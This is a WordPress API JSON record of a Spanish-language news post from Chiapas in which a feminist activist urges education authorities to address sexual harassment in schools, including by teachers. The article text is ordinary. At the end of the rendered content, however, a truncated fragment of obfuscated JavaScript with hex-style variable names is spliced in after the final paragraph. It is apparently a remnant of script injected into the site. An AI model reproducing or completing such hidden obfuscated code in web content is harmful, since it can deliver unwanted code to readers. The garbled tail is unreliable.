{"id":23303,"date":"2025-08-02T04:25:07","date_gmt":"2025-08-02T04:25:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23303"},"modified":"2025-08-02T04:25:08","modified_gmt":"2025-08-02T04:25:08","slug":"piden-trabajar-en-erradicar-acoso-sexual-en-escuelas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23303","title":{"rendered":"Piden trabajar en erradicar acoso sexual en escuelas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"600\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/IMG-20250801-WA0002.jpg\" alt=\"\" class=\"wp-image-23304\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/IMG-20250801-WA0002.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/IMG-20250801-WA0002-300x250.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>Sandra Aurora, integrante de la Agenda Feminista 20-30, hizo un llamado a las autoridades educativas a trabajar el tema del acoso sexual al interior de las escuelas del estado de Chiapas.<\/p>\n\n\n\n<p>Expuso que en redes sociales alumnas alzaron la voz durante la ceremonia de graduaci\u00f3n durante el cierre del ciclo escolar 2024-2025.<\/p>\n\n\n\n<p>Dijo que es una situaci\u00f3n al interior de las aulas, cuando deben ser espacios seguros.<\/p>\n\n\n\n<p>\u201cTenemos una situaci\u00f3n muy cr\u00edtica en Chiapas en el tema de feminicidios y de agresiones a las mujeres que deben de trabajarse desde la Secretar\u00eda de Educaci\u00f3n, para fomentar el respeto y tambi\u00e9n a alzar la voz cuando haya v\u00edctimas de este delito que ha sido cometido por los mismos docentes\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Coment\u00f3 que: \u201cTambi\u00e9n en la escuela es obligaci\u00f3n de los profesores conocer esos temas, porque la ley nos respalda, cuando hacen este tipo de invitaciones, por eso tienen que saber las personas que ocupen esos cargos y si no saben que busquen buenos asesores\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. Sandra Aurora, integrante de la Agenda Feminista 20-30, hizo un llamado a las autoridades educativas a trabajar el tema del acoso sexual al interior de las escuelas del estado de Chiapas. Expuso que en redes sociales alumnas alzaron la voz durante la ceremonia de graduaci\u00f3n durante el cierre del ciclo escolar 2024-2025. Dijo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23304,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23303","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23303","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23303"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23303\/revisions"}],"predecessor-version":[{"id":23305,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23303\/revisions\/23305"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23304"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23303"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23303"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23303"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}